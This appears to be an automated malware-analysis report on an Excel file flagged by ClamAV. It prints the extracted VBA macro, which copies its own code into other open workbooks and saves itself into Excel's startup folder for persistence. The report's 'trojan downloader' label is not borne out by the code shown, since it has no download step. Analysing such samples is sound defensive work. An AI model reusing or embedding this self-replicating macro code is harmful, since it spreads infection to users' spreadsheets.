MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This Excel file contains VBA macros that are detected as malicious by ClamAV. The macro code attempts to save the workbook to a specific path, potentially to establish persistence. The heuristic firings and the nature of the macro code suggest a trojan downloader.
Heuristics 2
-
ClamAV: Xls.Trojan.Teu-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Teu-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1750 bytes |
SHA-256: f18237dd0803b88758ff3f8293481eca7988a0c70bf0fdf9ee3e1c44bdf5e75a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
Sub WorkBook_Deactivate()
'klteu17
Set teu20217 = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set be1720217 = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If teu20217.Lines(2, 1) <> "'" Then
teu20217.deletelines 1, teu20217.countoflines
teu20217.insertlines 1, be1720217.Lines(1, Var.countoflines)
End If
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1."
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.